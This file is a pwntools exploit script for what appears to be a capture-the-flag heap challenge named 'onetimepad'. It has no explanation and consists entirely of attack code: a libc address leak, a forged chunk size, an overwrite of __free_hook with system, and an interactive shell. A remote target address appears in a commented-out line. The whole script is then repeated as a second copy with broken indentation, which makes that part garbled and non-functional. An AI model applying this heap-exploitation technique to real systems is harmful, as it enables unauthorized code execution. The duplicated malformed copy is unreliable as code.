YiChenChai/onetimepad.py

## onetimepad.py
from pwn import *
proc = process('/tmp/pwn/onetimepad_debug', env={'LD_PRELOAD':'/tmp/out/lib/x86_64-linux-gnu/libc.so.6'})
# proc = remote('88.198.154.140', 31336)
def write(c):
	proc.sendlineafter('> ', 'w')
	proc.sendline(c)
def read(idx):
	proc.sendlineafter('> ', 'r')
	proc.sendline(str(idx))
	return proc.recvuntil('\n')[:-1]
def rewrite(idx, c):
	proc.sendlineafter('> ', 'e')
	proc.sendline(str(idx))
	proc.sendline(c)

write('A' * 0x50)
write('A' * 0x50)
write('A' * 0x50)
write('A' * 0x448)
write('A' * 0x10)
read(0)
read(1)
read(2)
read(3)
write('A' * 0x8)
write('A' * 0x40f)
write('A' * 0x8)
rewrite(3, 'A'*0x18 + p16(0x441))
read(1)
write('A' * 0x40f)
read(1)
OFFSET = 0x1bbca0
FREE_HOOK = 0x1bd8e8
SYSTEM = 0x449c0
libcleak = u64(read(2).ljust(8,'\x00'))
libcbase = libcleak - OFFSET
log.info('0x%x' % libcbase)
pause()
write('sh;'.ljust(0x420, 'A') + p64(libcbase + FREE_HOOK))
write('A')
write(p64(libcbase + SYSTEM))
read(1)
proc.interactive()
	from pwn import *
	proc = process('/tmp/pwn/onetimepad_debug', env={'LD_PRELOAD':'/tmp/out/lib/x86_64-linux-gnu/libc.so.6'})
	# proc = remote('88.198.154.140', 31336)
	def write(c):
	proc.sendlineafter('> ', 'w')
	proc.sendline(c)
	def read(idx):
	proc.sendlineafter('> ', 'r')
	proc.sendline(str(idx))
	return proc.recvuntil('\n')[:-1]
	def rewrite(idx, c):
	proc.sendlineafter('> ', 'e')
	proc.sendline(str(idx))
	proc.sendline(c)

	write('A' * 0x50)
	write('A' * 0x50)
	write('A' * 0x50)
	write('A' * 0x448)
	write('A' * 0x10)
	read(0)
	read(1)
	read(2)
	read(3)
	write('A' * 0x8)
	write('A' * 0x40f)
	write('A' * 0x8)
	rewrite(3, 'A'*0x18 + p16(0x441))
	read(1)
	write('A' * 0x40f)
	read(1)
	OFFSET = 0x1bbca0
	FREE_HOOK = 0x1bd8e8
	SYSTEM = 0x449c0
	libcleak = u64(read(2).ljust(8,'\x00'))
	libcbase = libcleak - OFFSET
	log.info('0x%x' % libcbase)
	pause()
	write('sh;'.ljust(0x420, 'A') + p64(libcbase + FREE_HOOK))
	write('A')
	write(p64(libcbase + SYSTEM))
	read(1)
	proc.interactive()